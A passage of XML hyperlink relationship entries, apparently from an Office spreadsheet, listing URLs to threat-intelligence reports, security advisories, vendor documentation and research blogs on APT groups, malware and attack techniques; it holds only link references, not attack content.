Target="https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/" TargetMode="External"/><Relationship Id="rId713" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/" TargetMode="External"/><Relationship Id="rId920" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf" TargetMode="External"/><Relationship Id="rId1343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html" TargetMode="External"/><Relationship Id="rId1550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" TargetMode="External"/><Relationship Id="rId1648" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/" TargetMode="External"/><Relationship Id="rId2601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" TargetMode="External"/><Relationship Id="rId1203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/apt-trends-report-q1-2021/101967" TargetMode="External"/><Relationship Id="rId1410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html" TargetMode="External"/><Relationship Id="rId1508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://adsecurity.org/?p=1275" TargetMode="External"/><Relationship Id="rId1855" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" TargetMode="External"/><Relationship Id="rId2906" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://source.winehq.org/WineAPI/samlib.html" TargetMode="External"/><Relationship Id="rId3070" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html" TargetMode="External"/><Relationship Id="rId1715" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7" TargetMode="External"/><Relationship Id="rId1922" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://o365blog.com/post/deviceidentity/" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/" TargetMode="External"/><Relationship Id="rId2184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/" TargetMode="External"/><Relationship Id="rId2391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&amp;tabid=2" TargetMode="External"/><Relationship Id="rId3028" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/resources/integrity_assurance.html" TargetMode="External"/><Relationship Id="rId570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764" TargetMode="External"/><Relationship Id="rId2044" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/processhacker/processhacker" TargetMode="External"/><Relationship Id="rId2251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/a-slice-of-2017-sofacy-activity/83930/" TargetMode="External"/><Relationship Id="rId2489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html" TargetMode="External"/><Relationship Id="rId2696" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/ItsReallyNick/status/1055321868641689600" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/engine/security/trust/content_trust/" TargetMode="External"/><Relationship Id="rId668" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/" TargetMode="External"/><Relationship Id="rId875" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" TargetMode="External"/><Relationship Id="rId1060" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.google.com/a/answer/7223765?hl=en" TargetMode="External"/><Relationship Id="rId1298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Msbuild/" TargetMode="External"/><Relationship Id="rId2111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://reaqta.com/2017/12/mavinject-microsoft-injector/" TargetMode="External"/><Relationship Id="rId2349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit" TargetMode="External"/><Relationship Id="rId2556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/jj852168.aspx" TargetMode="External"/><Relationship Id="rId2763" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/" TargetMode="External"/><Relationship Id="rId2970" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800668(v=ws.11)" TargetMode="External"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf" TargetMode="External"/><Relationship Id="rId735" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf" TargetMode="External"/><Relationship Id="rId942" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html" TargetMode="External"/><Relationship Id="rId1158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/" TargetMode="External"/><Relationship Id="rId1365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/help/2962486/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevati" TargetMode="External"/><Relationship Id="rId1572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea" TargetMode="External"/><Relationship Id="rId2209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/bad-rabbit-ransomware/82851/" TargetMode="External"/><Relationship Id="rId2416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group" TargetMode="External"/><Relationship Id="rId2623" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html" TargetMode="External"/><Relationship Id="rId1018" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/n1nj4sec/pupy" TargetMode="External"/><Relationship Id="rId1225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/lazarus-under-the-hood/77908/" TargetMode="External"/><Relationship Id="rId1432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/trojans/2019/09/trickbot-adds-new-trick-to-its-arsenal-tampering-with-trusted-texts/" TargetMode="External"/><Relationship Id="rId1877" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif" TargetMode="External"/><Relationship Id="rId2830" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/" TargetMode="External"/><Relationship Id="rId2928" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-proxy-service/" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/" TargetMode="External"/><Relationship Id="rId802" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.finfisher.com/FinFisher/index.html" TargetMode="External"/><Relationship Id="rId1737" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/secguide/2018/12/10/remote-use-of-local-accounts-laps-changes-everything/" TargetMode="External"/><Relationship Id="rId1944" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" TargetMode="External"/><Relationship Id="rId3092" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20180615122133/https:/www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/rest/api/resources/" TargetMode="External"/><Relationship Id="rId1804" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/connect/blogs/trojanzeroaccessc-hidden-ntfs-ea" TargetMode="External"/><Relationship Id="rId592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/" TargetMode="External"/><Relationship Id="rId2066" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts" TargetMode="External"/><Relationship Id="rId2273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/gold-southfield" TargetMode="External"/><Relationship Id="rId2480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2019/01/return-of-emotet.html" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/" TargetMode="External"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/" TargetMode="External"/><Relationship Id="rId897" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" TargetMode="External"/><Relationship Id="rId1082" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.google/threat-analysis-group/update-threat-landscape-ukraine" TargetMode="External"/><Relationship Id="rId2133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse" TargetMode="External"/><Relationship Id="rId2340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/" TargetMode="External"/><Relationship Id="rId2578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html" TargetMode="External"/><Relationship Id="rId2785" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" TargetMode="External"/><Relationship Id="rId2992" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/s3/" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/" TargetMode="External"/><Relationship Id="rId757" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee" TargetMode="External"/><Relationship Id="rId964" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html" TargetMode="External"/><Relationship Id="rId1387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msitpros.com/?p=3960" TargetMode="External"/><Relationship Id="rId1594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/cc228086.aspx" TargetMode="External"/><Relationship Id="rId2200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.se.com/ww/en/download/document/SESN-2018-236-01/" TargetMode="External"/><Relationship Id="rId2438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/security-center/writeup/2016-081923-2700-99" TargetMode="External"/><Relationship Id="rId2645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/" TargetMode="External"/><Relationship Id="rId2852" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.trendmicro.com/trendlabs-security-intelligence/kunming-attack-leads-to-gh0st-rat-variant/" TargetMode="External"/><Relationship Id="rId617" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7" TargetMode="External"/><Relationship Id="rId824" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html" TargetMode="External"/><Relationship Id="rId1247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080105/KL_Epic_Turla_Technical_Appendix_20140806.pdf" TargetMode="External"/><Relationship Id="rId1454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs" TargetMode="External"/><Relationship Id="rId1661" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59" TargetMode="External"/><Relationship Id="rId1899" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/" TargetMode="External"/><Relationship Id="rId2505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2017/07/template-injection.html" TargetMode="External"/><Relationship Id="rId2712" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA17-293A" TargetMode="External"/><Relationship Id="rId1107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/" TargetMode="External"/><Relationship Id="rId1314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts" TargetMode="External"/><Relationship Id="rId1521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365" TargetMode="External"/><Relationship Id="rId1759" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670" TargetMode="External"/><Relationship Id="rId1966" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://x-c3ll.github.io/posts/PAM-backdoor-DNS/" TargetMode="External"/><Relationship Id="rId1619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal" TargetMode="External"/><Relationship Id="rId1826" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=227" TargetMode="External"/><Relationship Id="rId2088" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing" TargetMode="External"/><Relationship Id="rId2295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/" TargetMode="External"/><Relationship Id="rId3041" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x25.html" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/alerts/aa20-239a" TargetMode="External"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/" TargetMode="External"/><Relationship Id="rId2155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html" TargetMode="External"/><Relationship Id="rId681" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/" TargetMode="External"/><Relationship Id="rId779" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/" TargetMode="External"/><Relationship Id="rId986" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Kevin-Robertson/Conveigh" TargetMode="External"/><Relationship Id="rId2362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec" TargetMode="External"/><Relationship Id="rId2667" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/" TargetMode="External"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44" TargetMode="External"/><Relationship Id="rId639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/" TargetMode="External"/><Relationship Id="rId1171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intrinsec.com/egregor-prolock/?cn-reloaded=1" TargetMode="External"/><Relationship Id="rId1269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&amp;column=&amp;search=&amp;searchSDate=&amp;searchEDate=&amp;bbsDataCategory=" TargetMode="External"/><Relationship Id="rId1476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/" TargetMode="External"/><Relationship Id="rId2015" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/" TargetMode="External"/><Relationship Id="rId2222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/apt-trends-report-q2-2017/79332/" TargetMode="External"/><Relationship Id="rId2874" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29" TargetMode="External"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/logging/docs/audit" TargetMode="External"/><Relationship Id="rId846" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html" TargetMode="External"/><Relationship Id="rId1031" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BishopFox/sliver/wiki/Transport-Encryption" TargetMode="External"/><Relationship Id="rId1129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/" TargetMode="External"/><Relationship Id="rId1683" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-US/library/aa375365" TargetMode="External"/><Relationship Id="rId1890" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-3610" TargetMode="External"/><Relationship Id="rId1988" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/" TargetMode="External"/><Relationship Id="rId2527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc700828.aspx" TargetMode="External"/><Relationship Id="rId2734" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/analysis-reports/AR18-165A" TargetMode="External"/><Relationship Id="rId2941" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" TargetMode="External"/><Relationship Id="rId706" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/" TargetMode="External"/><Relationship Id="rId913" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html" TargetMode="External"/><Relationship Id="rId1336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html" TargetMode="External"/><Relationship Id="rId1543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.microsoft.com/kb/314984" TargetMode="External"/><Relationship Id="rId1750" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" TargetMode="External"/><Relationship Id="rId2801" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html" TargetMode="External"/><Relationship Id="rId1403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/" TargetMode="External"/><Relationship Id="rId1610" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/jj865668.aspx" TargetMode="External"/><Relationship Id="rId1848" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode" TargetMode="External"/><Relationship Id="rId3063" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man1/split.1.html" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://azure.microsoft.com/en-us/services/storage/blobs/" TargetMode="External"/><Relationship Id="rId1708" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloudblogs.microsoft.com/microsoftsecure/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/?source=mmpc" TargetMode="External"/><Relationship Id="rId1915" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a" TargetMode="External"/><Relationship Id="rId496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 